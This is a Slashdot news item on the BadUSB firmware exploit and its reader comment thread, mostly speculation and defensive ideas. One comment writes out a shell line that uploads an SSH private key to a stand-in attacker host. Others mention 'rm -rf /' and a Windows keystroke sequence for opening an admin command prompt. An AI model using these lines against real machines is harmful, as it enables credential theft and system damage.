"BadUSB" Exploit Makes Devices Turn "Evil"

timothy posted about 3 months ago | from the thinkgeek-had-something-funnier-years-ago dept.

Security 205

An anonymous reader writes with a snippet from Ars Technica that should make you (even more) skeptical about plugging in random USB drives, or allowing persons unknown physical access to your computer's USB ports: When creators of the state-sponsored Stuxnet worm used a USB stick to infect air-gapped computers inside Iran's heavily fortified Natanz nuclear facility, trust in the ubiquitous storage medium suffered a devastating blow. Now, white-hat hackers have devised a feat even more seminal—an exploit that transforms keyboards, Web cams, and other types of USB-connected devices into highly programmable attack platforms that can't be detected by today's defenses. Dubbed BadUSB, the hack reprograms embedded firmware to give USB devices new, covert capabilities. In a demonstration scheduled at next week's Black Hat security conference in Las Vegas, a USB drive, for instance, will take on the ability to act as a keyboard that surreptitiously types malicious commands into attached computers. A different drive will similarly be reprogrammed to act as a network card that causes connected computers to connect to malicious sites impersonating Google, Facebook or other trusted destinations. The presenters will demonstrate similar hacks that work against Android phones when attached to targeted computers. They say their technique will work on Web cams, keyboards, and most other types of USB-enabled devices.

Do I need to be concerned about this? (0)

Anonymous Coward | about 3 months ago | (#47574363)

Do I need to be concerned about this?

Re:Do I need to be concerned about this? (0)

Anonymous Coward | about 3 months ago | (#47574409)

No

Re:Do I need to be concerned about this? (2)

Timothy Hartman (2905293) | about 3 months ago | (#47574427)

nah. dunk your computer and USB device in holy water and it's good to go again.

Re:Do I need to be concerned about this? (4, Funny)

thieh (3654731) | about 3 months ago | (#47574541)

Nah, we are already screwed beyond help.

nah, it's an easy fix (1)

swschrad (312009) | about 3 months ago | (#47574651)

sledgehammer the sumbuck into dust and buy a new computer. no problem.

Re:Do I need to be concerned about this? (2, Interesting)

Anonymous Coward | about 3 months ago | (#47574849)

Yes, the "white-hat hackers" are Karsten Nohl and his gang. That's the guy behind the GSM hack. If he wants to know the algorithm that a smart card uses for encryption, he removes layer by layer of the chip and reconstructs the algorithm from the circuits. Nohl does not kid around. If he says it can be hacked, it can.

Re:Do I need to be concerned about this? (3, Interesting)

Penguinisto (415985) | about 3 months ago | (#47575417)

Depends.

I once worked for a company that wrote web banking software. The laptops/desktops/etc of certain employees had a 'driver' that continually monitored the USB ports. If anything plugged into it that had storage on it but not the proper corporate auth key to connect as an approved storage device? It would automatically send an email to the IT department, immediately shut off the entire USB subsystem in the OS, and it stayed that way until the device was re-imaged (in many cases making the device completely useless). It also got you immediately perp-walked out of the building and freshly unemployed, unless you could immediately give them a reasonable (and provable) explanation as to why it happened.

Now in this case, I suspect that if the bad stick presented itself to the OS as a keyboard/mouse/whatever, it may circumvent that (I say "may" because I don't know if it would be able to dump any non-keyboard/mouse-related data onto the machine w/o presenting itself as storage.)

Either way, if you're that worried about it, then epoxy the USB ports shut (well, except on the phone for obvious reasons...)

Re:Do I need to be concerned about this? (4, Insightful)

EvilSS (557649) | about 3 months ago | (#47575449)

Are you:
* A bank?
* A utility?
* A large corporation?
* A defense contractor?
* A military?
* A government?
* A "whistleblower" (in the figurative sense, not someone who just blows a literal whistle)?
* A journalist?
* A civil rights/government abuse/environmental/economic activist?
* Are you a member of an "anti-government" group or movement?
* Are you Muslim?
* Are you or have you ever been brown?
* Now or will you in the future travel through a customs inspection area of any country?
* Under active investigation by a law enforcement agency?
* A rabble-rouser?
* A person with opinions that are counter to those of your government?
* A sentient artificial lifeform?

If you answered yes to any of the above, then yes you need to be worried. If you did not, then no, you probably don't need to be worried.

USB 4.x to offer signed USB device signatures??? (5, Interesting)

Anonymous Coward | about 3 months ago | (#47574385)

Here come the digitally signed / encrypted usb dongles for USB 4.x, where every device has a firmware signature encrypted within the device and part of the usb handshake will be to read the entire firmware to re-calc the signature to make sure it matches, with a 3rd comparison via the internet to a usb device registry.

Then the criminals will figure out how to falsify the signature with the bad firmware anyway.

Re:USB 4.x to offer signed USB device signatures?? (2)

fustakrakich (1673220) | about 3 months ago | (#47574413)

...with a 3rd comparison via the internet to a usb device registry.

That makes the whole concept dead on arrival. Anything that requires a connection is no damn good, aside from a remote terminal, I suppose

Re:USB 4.x to offer signed USB device signatures?? (0)

Anonymous Coward | about 3 months ago | (#47574505)

Of course the 3rd comparison would/could only be done "when" or "if" the device is "online"...

Perhaps something simple like a USB device checker - where any usb devices would be plugged in before they could be attached to a system that would confirm the device's firmware, signatures, etc...

Re:USB 4.x to offer signed USB device signatures?? (1)

Lumpy (12016) | about 3 months ago | (#47574793)

All you need to do is have the USB drive mounted by a locked down device. Example: a RasPi set to read only on the OS with everything disabled; all it does is mount the USB drive and then offer up the contents via the network.

I don't care what you have in the USB stick, it will not auto run and infect. Then you can look at the contents with another PC via the network and see the real contents or even run automated tests on it before it is available to the user's machine.

It is not hard to make something that will stop this crap.

Re:USB 4.x to offer signed USB device signatures?? (2, Informative)

Anonymous Coward | about 3 months ago | (#47575013)

What they are talking about here infects on firmware/driver level initialization between USB device and computer when plugged in that is an inherent part of the USB standard, before and invisible to any user mode (software) inspection (and how do you plan to see/test that the usb firmware is not infected?). This is not your regular Windows auto-run type problem.

Re:USB 4.x to offer signed USB device signatures?? (1)

bill_mcgonigle (4333) | about 3 months ago | (#47574813)

That makes the whole concept dead on arrival. Anything that requires a connection is no damn good, aside from a remote terminal, I suppose

How else do you plan to distribute a CRL? The firmware can get programmed with the updated certificate store when you have access to the CRL, but it can operate fine offline without it (accepting the enhanced risk).

Re:USB 4.x to offer signed USB device signatures?? (3, Insightful)

Anonymous Coward | about 3 months ago | (#47574781)

Wouldn't it be much simpler to make USB device firmware not upgradeable? When have you ever updated the firmware on a mouse or keyboard? If there's a legitimate need to leave them upgradeable, put in a jumper or switch that is off by default.

Re:USB 4.x to offer signed USB device signatures?? (1)

Richy_T (111409) | about 3 months ago | (#47574897)

Then the hacker simply swaps the hardware for updatable hardware.

Re:USB 4.x to offer signed USB device signatures?? (2)

jakimfett (2629943) | about 3 months ago | (#47575117)

At the point where a hacker has physical access to one of your machines, you have bigger problems than whether they're going to swap out your mouse for something more easily hackable.

Re:USB 4.x to offer signed USB device signatures?? (0)

Anonymous Coward | about 3 months ago | (#47575141)

Then the hacker simply swaps the hardware for updatable hardware.

Which would require the hacker to have physical access to the machine. That kind of limits the possibilities for a potential hacker.

Re:USB 4.x to offer signed USB device signatures?? (2)

mythosaz (572040) | about 3 months ago | (#47575447)

...except that plenty of people, even those who should know better, are willing to accept a free flash drive.

And that flash drive also is a HID device, and it's going to sometimes send a series of keystrokes that issue commands you don't like.

This entire hack depends on a device that looks like a keyboard, not being a keyboard, but being a keyboard AND a network card - or a flash drive that's ALSO a HID device - or a webcam that's also a BT receiver.

Re:USB 4.x to offer signed USB device signatures?? (1)

jayveekay (735967) | about 3 months ago | (#47575647)

Well perhaps the OS should ask the user "I see you've just plugged in a USB device that claims to be both a keyboard and a network adapter. Do you want to give this device both keyboard I/O and network access to your PC?"...

Basically, the same way that when you install an app on a mobile phone, the system prompts you for what capabilities you want to grant the app, your PC OS could do something similar for USB devices.

Re:USB 4.x to offer signed USB device signatures?? (0)

Anonymous Coward | about 3 months ago | (#47575051)

Then the criminals will figure out how to falsify the signature with the bad firmware anyway.

Well, it isn't exactly hard. The computer can't directly access the device firmware. You'd have to trust the device to do that.

Re:USB 4.x to offer signed USB device signatures?? (0)

Anonymous Coward | about 3 months ago | (#47575183)

You forgot: "And will only work with Windows Secure Computing."

Re:USB 4.x to offer signed USB device signatures?? (1)

microhax (2837881) | about 3 months ago | (#47575277)

And soon after that comes the USB device DLC. Out of the box it supports a single left click. $2.99 for the left and middle buttons, $4.99 for a scroll wheel, and a monthly charge of $7.99 to ensure it all stays secure.

and this is news why? (1, Insightful)

halfEvilTech (1171369) | about 3 months ago | (#47574401)

I thought it was common sense not to plug in untrusted devices to your computer. Especially unknown thumb drives, unless you can use them in a read only device.

Re:and this is news why? (2)

halfEvilTech (1171369) | about 3 months ago | (#47574421)

and of course I re-read this and realize they meant also changing a webcam or keyboard to be malicious. Man I shouldn't post before my morning coffee.

Re:and this is news why? (3, Informative)

NJRoadfan (1254248) | about 3 months ago | (#47574669)

and of course I re-read this and realize they meant also changing a webcam or keyboard to be malicious. Man I shouldn't post before my morning coffee.

Let them try reprogramming a Model M keyboard. There is one perk to legacy PS/2 ports, they are secure!

Re:and this is news why? (1)

Anonymous Coward | about 3 months ago | (#47574817)

Faking keystrokes on a PS/2 keyboard should be the same/similar to that of USB. If it wasn't, small adapters wouldn't be quite so ubiquitous.
The only security you get by using PS/2 is through obscurity, which is hardly good security.

Re:and this is news why? (2)

Blaskowicz (634489) | about 3 months ago | (#47574907)

The best security in this case is if there were no PS/2 keyboard connected before, then it won't be recognised until the computer is shut down or rebooted.
If you use a Model M, you will probably even fry the PS/2 port - but an "evil" Model M would have a replacement micro-controller that wouldn't fry the port by drawing too much current, like keyboards from the 90s and 00s don't.

Re:and this is news why? (3, Informative)

blueg3 (192743) | about 3 months ago | (#47574479)

The whole point of this is that the malware reprograms the firmware of existing, trusted devices to make them malicious.

Re:and this is news why? (2, Informative)

Anonymous Coward | about 3 months ago | (#47574789)

As far as I can tell from the article it's not "malware reprograms", it's "malicious third party with physical access to USB device reprograms".

Quite a bit of difference.

Re:and this is news why? (4, Insightful)

janoc (699997) | about 3 months ago | (#47574883)

I would love to see malware that will reprogram a mask-programmed blob in a common throwaway hardware. Or a microcontroller in a webcam that doesn't even have the programming pins (typically some sort of ISP or JTAG) connected to anything USB accessible (or not even connected at all, at best to some test pads).

A typical USB stick or a webcam don't have hardware to permit firmware upgrades, even though the silicon inside could be theoretically upgradable. Not to mention that the exploit would have to be written specifically for the target hardware - different processors, memory layout, USB interface, etc - all that would make it really hard to produce a generic malware. If you want to see what is involved in something like that, look at the article on hacking HDD controllers:
http://spritesmods.com/?art=hd... [spritesmods.com] And that is a hard drive, which are produced by only a few manufacturers and have relatively standardized interfaces and controllers. Now imagine having to do that sort of reverse engineering on every type of hard drive in common use if you wanted to write a reasonably effective malware (e.g. a data stealing worm). It is much easier to exploit some Windows bug or use a phishing scam than this.

So yes, this is potentially a threat, but panicking over your USB sticks or webcams going rogue on you is vastly overblown. This could be an issue for a very targeted attack where the benefits of compromising e.g. a keyboard of a high value target will outweigh the effort required, but not really anything else. And that assumes that the keyboard is actually able to be updated! It would be probably simpler to just send an operative in and install e.g. a keylogger ...

Oh and they mention the "BadBios" story ... Nobody was ever able to confirm that apart from the original very confused researcher.

Reprogramming at the factory. (1)

Chmarr (18662) | about 3 months ago | (#47575543)

Okay, so, instead the blackhats break into the factory that is manufacturing the chips and modify the firmware that is being written to them. Now, every USB keyboard that the company manufactures looks to the computer as both a USB keyboard, and a USB network device.

I'm sure you remember those instances where malware was being pre-installed onto pre-formatted external drives, right?

Sure, there's a lot more to be done to turn that "Fake network device" into something that can trick the OS into treating it as a default gateway, as well as acting as a forwarding device so that modified packets can make it out the _real_ gateway, but... it only needs one weird combination of behaviours... somewhere... to be effective.

ftdi, Atmel are VERY common in devices. I did it. (2)

raymorris (2726007) | about 3 months ago | (#47575603)

I bet at least 20% of the USB devices use the same FTDI chip for USB functionality, and another 20% use Atmel AVR microcontrollers. If your malware patched or replaced the Atmel firmware, you could own a lot of systems.

It wouldn't even NEED to continue to work like the original device, so you could just replace the firmware with the Atmel firmware I wrote last night. The user plugs in their webcam or tries to turn it on. The webcam doesn't work anymore. The bad guy doesn't care, at that point he has already owned the machine, just a few seconds after the device was plugged in.

Re:and this is news why? (5, Insightful)

Canth7 (520476) | about 3 months ago | (#47574489)

I thought it was common sense not to plug in untrusted devices to your computer. Especially unknown thumb drives, unless you can use them in a read only device.

The problem at hand is that you can take a trustworthy device, plug it into an infected computer and then your trustworthy device becomes compromised and not easily detectably so, infecting your formerly clean PC. So far, no comments on mitigating procedures or OS specific circumstances. Most OSes will automatically load USB devices so in theory this could affect just about every OS whereby a compromised phone decides to become a keyboard and starts typing keystrokes and sending data to a 3rd party. Scary, at least in theory.

Re:and this is news why? (4, Interesting)

NMBob (772954) | about 3 months ago | (#47574627)

Or they could already come programmed from a "trusted" factory. It's not like that hasn't happened before. Yikes!

Not really that scary (0)

Viol8 (599362) | about 3 months ago | (#47574929)

What's the point of the device sending keystrokes if it has no idea where they are going? "rm -rf /"? Won't do much if you don't have a root xterm in focus or the focus is a word processor/browser/game/whatever. Unless it acts like a mouse too and is smart enough to navigate its way around the screen, kick off an xterm, su with the root password etc etc...

But then that's with a proper OS. I guess if you're running windows all bets are off.

Re:Not really that scary (1)

Anonymous Coward | about 3 months ago | (#47574995)

Here is how it works on many windows computers: windows key, "command," menu key, down key, down key, down key, enter, left key, enter. You now have a command prompt you can do anything on with admin privileges on many computers.

Another option is: windows key + r, "iexplore example.com" as long as that site has some targeted output they are toast.

Leverage (3, Informative)

PRMan (959735) | about 3 months ago | (#47574405)

And everyone said that when Hardison would program USB sticks to type stuff and send all the data back to headquarters when they just plugged it in a computer that it was not real. It turns out he was just ahead of everyone else.

Re:Leverage (1)

jakimfett (2629943) | about 3 months ago | (#47575193)

$hat = 'tinfoil'

Nah, Leverage is just an illegally de-classified documentary of a black ops crime fighting unit from the future, sent back to us by the rebels as a warning about what's coming next.

How is this viable as an attack medium? (1)

Joe Gillian (3683399) | about 3 months ago | (#47574439)

From the article, it seems like this attack is done by hardware-modifying a USB stick so that the firmware can be changed. While I get that this is a major problem for organizations that have a bunch of computers that could potentially have one of these things inserted into them, for most people it doesn't seem like a problem. The most I can see happening with this is someone putting bad firmware onto a USB device and selling them on EBay or similar as a means of stealing people's data, but I think that would be pretty easy to track - when a whole bunch of people who all bought things from one person suddenly notice that their credit card numbers were stolen, law enforcement will figure out the trick pretty quickly.

Re:How is this viable as an attack medium? (4, Interesting)

gstoddart (321705) | about 3 months ago | (#47574475)

The most I can see happening with this is someone putting bad firmware onto a USB device and selling them on EBay or similar as a means of stealing people's data, but I think that would be pretty easy to track

Really? Because the worst I can imagine is the NSA or another spy agency getting a shipment of devices from the manufacturer so that when you get it delivered new and in the box it's already compromised. Your brand new shiny Dell or HP would be compromised from the factory.

Think I've not got enough layers of tinfoil? Google for "Cisco NSA routers".

At this point, if it can be exploited by these clowns, it will be.

law enforcement will figure out the trick pretty quickly

Unless, of course, it's law enforcement who have done it.

Re:How is this viable as an attack medium? (2)

jakimfett (2629943) | about 3 months ago | (#47575297)

I'd be interested to see how well this works against linux workstations. Having the ability to arbitrarily send keyboard commands will only be effective if a) they're the correct key commands (eg, the shortcut to open the terminal client, or a web browser, which changes depending on your desktop environment) and you can actually *do* those commands. Eg, "rm -rf /" isn't going to work without the superuser password.

That said...something like "cd ~/.ssh;ftp attack@myserver.hack;put id_rsa;exit" wouldn't necessarily need any sort of high level access...and getting ahold of someone's private key is akin to getting the holy grail, especially if you can do it without them realizing it.

Re:How is this viable as an attack medium? (3)

Anubis IV (1279820) | about 3 months ago | (#47574553)

I've heard about a few cases (which is a fancy way of saying, "I once heard a third-hand story, but am too lazy to fact check myself at the moment") of attackers leaving thumb drives in parking lots outside the buildings of offices they wanted to hack, as if the drives had been dropped out there by accident after slipping out of a pocket. Employees of the company inevitably found the drives, some of them kept the drives for personal use, and some of those drives eventually got plugged into computers inside the office. With AutoPlay settings and the like, it used to be fairly trivial for malware to enter an office that way.

Which is to say, if you find a USB drive in your company's parking lot, toss it in the trash if you can't find the original owner.

Re:How is this viable as an attack medium? (1)

Anonymous Coward | about 3 months ago | (#47575035)

I'm from a bigger company and we disable USB ports for exactly that reason. We had a rash of lost drives that when plugged in were USB composite devices. One part would be a mass storage device and the other would be a HID. After the driver was installed, they would try all sorts of tricks to get a command line or windows run box. They could then try opening websites or running programs on the USB drive that way.
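
The composite devices this comment describes (mass storage plus HID), and the keyboard-plus-network-card case raised earlier in the thread, show up in the interface classes a device declares in its USB configuration descriptor. The following Python is an added example, not code from any commenter; the descriptor bytes are constructed samples, and the two flagged combinations are an assumed policy rather than anything the thread specifies.

```python
"""Flag USB devices whose declared interfaces mix input with storage or
networking. Added example; all descriptor bytes below are constructed."""
import struct

# bInterfaceClass values from the USB-IF class code list.
CLASS_NAMES = {
    0x01: "audio", 0x02: "cdc-comm", 0x03: "hid", 0x08: "mass-storage",
    0x09: "hub", 0x0A: "cdc-data", 0x0E: "video", 0xE0: "wireless",
    0xFF: "vendor-specific",
}
NETWORK = {"cdc-comm", "cdc-data", "wireless"}
DT_CONFIG, DT_INTERFACE = 0x02, 0x04


def parse_interfaces(blob: bytes):
    """Walk one configuration descriptor and return a list of
    (interface number, class, subclass, protocol) tuples."""
    if len(blob) < 9 or blob[1] != DT_CONFIG:
        raise ValueError("not a configuration descriptor")
    total = struct.unpack_from("<H", blob, 2)[0]  # wTotalLength
    if total > len(blob):
        raise ValueError("wTotalLength exceeds supplied data")
    interfaces, off = [], 0
    while off < total:
        if off + 2 > total:
            raise ValueError("truncated descriptor header")
        length, dtype = blob[off], blob[off + 1]
        if length < 2 or off + length > total:
            raise ValueError("bad bLength at offset %d" % off)
        if dtype == DT_INTERFACE:
            if length < 9:
                raise ValueError("short interface descriptor")
            num, alt, _eps, cls, sub, proto = struct.unpack_from("6B", blob, off + 2)
            if alt == 0:  # alternate settings repeat the same interface
                interfaces.append((num, cls, sub, proto))
        off += length  # skips endpoint, HID and class-specific descriptors
    return interfaces


def assess(interfaces):
    """Return the suspicious role combinations (assumed policy)."""
    roles = {CLASS_NAMES.get(cls, "class-0x%02x" % cls) for _n, cls, _s, _p in interfaces}
    findings = []
    if "hid" in roles and "mass-storage" in roles:
        findings.append("hid + mass-storage")
    if "hid" in roles and roles & NETWORK:
        findings.append("hid + network")
    return findings


# --- constructed sample descriptors -------------------------------------
def _iface(num, cls, sub=0, proto=0, eps=0, extra=b""):
    return bytes([9, DT_INTERFACE, num, 0, eps, cls, sub, proto, 0]) + extra


def _config(*ifaces):
    body = b"".join(ifaces)
    head = struct.pack("<BBHBBBBB", 9, DT_CONFIG, 9 + len(body),
                       len(ifaces), 1, 0, 0x80, 50)
    return head + body


_HID_DESC = bytes([9, 0x21, 0x11, 0x01, 0x00, 0x01, 0x22, 0x3F, 0x00])
_EP_INT_IN = bytes([7, 0x05, 0x81, 0x03, 8, 0, 10])
_EP_BULK_IN = bytes([7, 0x05, 0x82, 0x02, 0x00, 0x02, 0])
_EP_BULK_OUT = bytes([7, 0x05, 0x02, 0x02, 0x00, 0x02, 0])

_STORAGE = dict(cls=0x08, sub=0x06, proto=0x50, eps=2,
                extra=_EP_BULK_IN + _EP_BULK_OUT)
_KEYBOARD = dict(cls=0x03, sub=0x01, proto=0x01, eps=1,
                 extra=_HID_DESC + _EP_INT_IN)

FLASH_DRIVE = _config(_iface(0, **_STORAGE))
DRIVE_PLUS_KEYBOARD = _config(_iface(0, **_STORAGE), _iface(1, **_KEYBOARD))
KEYBOARD_PLUS_NIC = _config(_iface(0, **_KEYBOARD),
                            _iface(1, 0x02, 0x06, 0x00),  # CDC, Ethernet model
                            _iface(2, 0x0A))              # CDC data
WEBCAM = _config(_iface(0, 0x0E, 0x01), _iface(1, 0x01, 0x01))


def report(blob):
    """Summarise one configuration descriptor for an analyst."""
    ifaces = parse_interfaces(blob)
    return {"classes": [CLASS_NAMES.get(c, hex(c)) for _n, c, _s, _p in ifaces],
            "findings": assess(ifaces)}


if __name__ == "__main__":
    for name in ("FLASH_DRIVE", "DRIVE_PLUS_KEYBOARD", "KEYBOARD_PLUS_NIC", "WEBCAM"):
        print(name, report(globals()[name]))
```

This only inspects what a device declares: firmware that re-enumerates as a plain keyboard and nothing else produces no finding. On Linux the raw bytes are exposed in the `descriptors` file under `/sys/bus/usb/devices/<device>/`, where the 18-byte device descriptor precedes the configuration descriptors.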

Re:How is this viable as an attack medium? (1)

bware (148533) | about 3 months ago | (#47575255)

I have heard of this first hand. Plug in a USB device to see who to return it to, and not long after, security (computer and otherwise) pay you a visit to personally demonstrate the computer security policies you were supposed to learn from the online video training.

Re:How is this viable as an attack medium? (4, Interesting)

blueg3 (192743) | about 3 months ago | (#47574581)

1. A ton of USB devices are actually implemented as general-purpose components with programmable firmware (attached to whatever support hardware, like a network card or a webcam, is necessary). So they're more common than you think.

2. Smartphones are an excellent reprogrammable USB device that lots of individuals have.

3. This is difficult enough to really engineer well that it is probably a bigger threat as a targeted attack against a big organization for now. Until someone does the engineering to make it easy to deploy widely. Then, it'll be a threat for everyone. Kind of like automated hacking of consumer-grade routers to modify the firmware to participate in an Internet-wide portscan. It's the Metasploit effect: it's not a big problem until someone makes it automated, then it is.

Re:How is this viable as an attack medium? (5, Interesting)

Anonymous Coward | about 3 months ago | (#47574745)

Smartphones are the big problem. People think it is acceptable to just plug them in everywhere to "just charge them".

I can go to a train-station or another reasonable public spot. Look for a power outlet and plug in my "charging station" that turns a smartphone into a malicious device.
This will infect devices from a very diverse group that will travel around and connect their devices to whatever USB-port they can find.

Re:How is this viable as an attack medium? (1)

Anonymous Coward | about 3 months ago | (#47574799)

http://int3.cc/products/usbcondoms

Just cut the data cables in a normal usb cable. Leave the power cables intact. Job done.
(won't work if the host device requires a data connection in order to charge)

Re:How is this viable as an attack medium? (1)

Richy_T (111409) | about 3 months ago | (#47574921)

There is a further step worth taking. By adding a resistor (depends on device), the cable can signal it is a dumb charger, allowing a greater current draw if available.

Re:How is this viable as an attack medium? (1)

Anonymous Coward | about 3 months ago | (#47574633)

As I understand it, this can be done from software. IOW, a virus can silently and invisibly compromise a connected USB device for which a suitable firmware exists and can be deployed (downloaded from a command and control server after the initial virus infection has identified the USB devices attached to that system, or perhaps even patched on the fly, given enough common code across devices).

See the USB DFU or device firmware upgrade standard.
Not all devices adhere to the standard as read, but they do behave predictably and discovering the methods by which DFU mode or its equivalent is enabled is not difficult.

Morbidly fascinating.

Oh think of the fun when drivers update firmware (1, Troll)

silas_moeckel (234313) | about 3 months ago | (#47574467)

Windows loves to install USB drivers for all sorts of things. A couple NSA letters later and MS is now sending NSA payloads. They do not even have to ever touch the hardware.

Sure this is the case with any hardware and MS but you would assume a secure facility would lock it down. But USB now you have the sneaker net issues.

Re:Oh think of the fun when drivers update firmwar (0)

Anonymous Coward | about 3 months ago | (#47574557)

I was wondering where the AntiMS bullshit was

Re:Oh think of the fun when drivers update firmwar (0)

Anonymous Coward | about 3 months ago | (#47574787)

It's the only OS I know that updates firmware on devices without me asking for it.

Re:Oh think of the fun when drivers update firmwar (0)

Anonymous Coward | about 3 months ago | (#47575595)

It's the only OS I know that updates firmware on devices without me asking for it.

I think that you may be a little confused. I've been using computers for over 20 years and I still haven't seen Windows update a firmware on its own. FIRMware? I think you don't have a clue about what you're talking about.

Re: Oh think of the fun when drivers update firmwa (0)

Anonymous Coward | about 3 months ago | (#47575037)

Yet he made a valid point which you did not answer. MS is compromised and we need to face that.

Re: Oh think of the fun when drivers update firmwa (0)

Anonymous Coward | about 3 months ago | (#47575545)

Yet he made a valid point which you did not answer. MS is compromised and we need to face that.

Valid? Really? I don't see it. What the hell do drivers have to do with anything?

Re:Oh think of the fun when drivers update firmwar (1)

blueg3 (192743) | about 3 months ago | (#47574659)

A couple NSA letters later and MS is now sending NSA payloads.

Because they couldn't already do this with network-distributed software updates?

Actually not all that hard.... (0)

Anonymous Coward | about 3 months ago | (#47574469)

Most keyboards and other such devices use PIC, or similar, USB microcontrollers (e.g. PIC18F14K50). If the developers didn't lock down the programmability of the existing microcontroller they can easily be reprogrammed. Albeit - usually not through the USB port - but through other pins on the chip. That requires physical access to the keyboard to plant the malicious code. As long as the device uses the OS's HUD drivers - nothing needs to be changed/updated/detected on the host side.

Now, to create a new keyboard, camera, drive, etc. that has malicious code built in from the get-go... is, actually, rather trivial. And, again, so long as the developers stick to the HUD drivers - this is not much more than an afternoon project.

In other words - been there - done that. Nothing to see here. Move along.

Go pick up Microchip's Low Pin Count USB Development KIT for around $100 from Mouser - you get a programmer and development board. Download the compilers and have at it.

I think the reason no one reported this before is that everyone thought that someone already did.

Simple (2)

NotInHere (3654617) | about 3 months ago | (#47574527)

just ask the user whether they want that second keyboard, network card, or mouse attached. And a malicious DNS server is also not the thing that doesn't let me sleep at night -- https was designed for that.

Re:Simple (5, Funny)

stewsters (1406737) | about 3 months ago | (#47574615)

"Click OK to connect mouse"

It leaves a bit of a chicken and egg problem for normal users of systems without a keyboard built in.

Re:Simple (1)

robmv (855035) | about 3 months ago | (#47574685)

Input this code I show you on screen with this virtual keyboard, and the OS filters every other input event from that device that is not targeted to that keyboard, validates the input and accepts or rejects the device. Annoying, I know, but not impossible to protect.

Re:Simple (1)

mythosaz (572040) | about 3 months ago | (#47575493)

It's still chicken and egg. Even if you have a touchscreen, that screen is an input device too, you know.

Re:Simple (0)

Anonymous Coward | about 3 months ago | (#47574717)

So the NSA forces Google or someone like them to issue certificates in the name of "national security", or just tricks you into installing them yourself, some companies do that to their employees. Then your browser says "this is legit, no worries mate" and you might go "thanks bud, no worries then".
There were fake certs for yahoo and google out there people were using, so it's not impossible, you just need to force an issuer to give them to you.

Old attack (4, Insightful)

robmv (855035) | about 3 months ago | (#47574549)

This kind of attack is not new, the new part is the examples of generic devices with hacked firmware to do that. This can be solved easily by requesting user authorization before activating any USB device type, for example, before telling the system that there is a new USB network device, ask the user for confirmation. The trick is with input devices, where the new device could be replacing a broken one (keyboard or mouse); the confirmation can be done by requesting the user to type a code displayed on screen or using the mouse to use an on-screen keyboard in order to accept the input device for general usage. The other problem is with devices permanently attached: assume that any attached device at boot time is trusted. If someone replaced your USB device when you weren't present, other more awful things could have been done.

Re:Old attack (0)

Anonymous Coward | about 3 months ago | (#47575473)

So, with this in mind ...

On linux, when 'udev' is probing for hardware identification post USB dev plugin, it is presumably 'reading' (running..?) that USB firmware, correct? Perhaps a module gets loaded from kernel, not from USB dev, and the device is now resident in /dev. Going beyond that, how would that 'firmware' be doing anything evil? Only way I see would be with ability to elevate itself out of udev process UID, to execute commands and communications. Wouldn't this require multiple software failures within udev, linux kernel, initrc, openrc, passwd, etc ... ?

SD Cards too (0)

Anonymous Coward | about 3 months ago | (#47574555)

Don't forget how easy it is to program the little ARM processor on a WiFi SD card: http://haxit.blogspot.ch/2013/08/hacking-transcend-wifi-sd-cards.html

Minimal Alert (1)

NotQuiteReal (608241) | about 3 months ago | (#47574559)

Yet another annoyance, necessary in this "modern" world...

While not a real solution at all, it should be easy for any OS to at least offer a pop-up approval when you plug in a USB device. E.g. "Do you want to connect this keyboard?" That would be a red flag if you didn't think it was a keyboard and give you a chance to deny it.

Maybe skip the warning for pure storage devices - but warn for anything else. It might be disconcerting to have a warning for "Connect this video camera" when you were plugging in a keyboard.

Re:Minimal Alert (1)

amorsen (7485) | about 3 months ago | (#47574677)

USB device drivers are not of sufficient quality to make that mitigation very viable. Just exploit the broken drivers instead; on most operating systems device drivers have the equivalent of root privileges.

Re:Minimal Alert (1)

Minwee (522556) | about 3 months ago | (#47575059)

NOTICE: USB DEVICES CONNECTED
The following devices have been connected to USB bus 5:
Device 0, Device ID="0123:4567", Manufacturer="Harmless USB Devices, Inc", DeviceClass="Hub", DeviceProtocol="Full speed hub"
Device 1, Device ID="0123:4567", Manufacturer="Harmless USB Devices, Inc", InterfaceClass="Mass Storage", InterfaceProtocol="Bulk Only"
Device 2, Device ID="0000:0000", Manufacturer="What is this", InterfaceClass="Human Interface Device", InterfaceProtocol="Keyboard"
Device 3, Device ID="0000:0000", Manufacturer="I don't even", InterfaceClass="Communications Device", InterfaceProtocol="AT-Commands", Interface="HSPA+ Mobile Broadband Modem"

The information is already there if you know where to look for it. All that would be required would be to put it into a notification window that attracts a bit more attention. It wouldn't prevent this kind of attack -- that would require user consent for activating any new devices, and be a bit challenging if that was your only functional keyboard -- but it would force naughty USB devices masquerading as harmless purveyors of porn^H^H^H^H useful business-related data to tip their hands when they try doing something they shouldn't.

Superglue all USB slots (1)

Ted Stoner (648616) | about 3 months ago | (#47574609)

A little dab 'll do ya ...

Re:Superglue all USB slots (1)

SydShamino (547793) | about 3 months ago | (#47574725)

Except the ones for your keyboard and mouse, right? Except your keyboard broke, so just plug in this new one you got from Dell via NSAUSPS.

Re:Superglue all USB slots (1)

Minwee (522556) | about 3 months ago | (#47575065)

Nah. Glue all of the USB ports up and only use safe, secure, wireless solutions like Bluetooth for your keyboard and mouse.

That should solve all of your security problems in a single stroke.

Re:Superglue all USB slots (1)

Minwee (522556) | about 3 months ago | (#47575071)

(I can't believe that I was able to type that with a straight face.)

Safety first, kids... (5, Funny)

blueshift_1 (3692407) | about 3 months ago | (#47574619)

Just another reason why you shouldn't stick foreign objects in your orifices...

Re:Safety first, kids... (1)

Nyder (754090) | about 3 months ago | (#47574749)

Just another reason why you shouldn't stick foreign objects in your orifices...

www.bad-dragon.com is okay though.

Re:Safety first, kids... (3, Funny)

gstoddart (321705) | about 3 months ago | (#47574927)

"Just another reason why you shouldn't stick foreign objects in your orifices..."

www.bad-dragon.com is okay though.

Must .... not ... paste ... URL ... into ... browser

Gak, that's so wrong, you sick bastard. ;-)

Not just USB (1)

jones_supa (887896) | about 3 months ago | (#47574629)

Almost any hardware component can be tampered with.

PS/2 Keyboard (0)

Anonymous Coward | about 3 months ago | (#47574631)

What about my PS/2 keyboard ;)

White hat hackers, if you build it I will come. (0)

Anonymous Coward | about 3 months ago | (#47574655)

We need an intermediate USB reader with programmable capabilities to display the USB ROM code and display that before the system is manually allowed to connect to it.

BUILD IT!

Re:White hat hackers, if you build it I will come. (1)

blueg3 (192743) | about 3 months ago | (#47574699)

It'd probably be easier to implement a little hardware device that places restrictions on device classes that can connect through it and limits hybrid devices (e.g., keyboard+mouse = ok, keyboard+webcam = reject).

Limited scope of vulnerability (2)

jrumney (197329) | about 3 months ago | (#47574733)

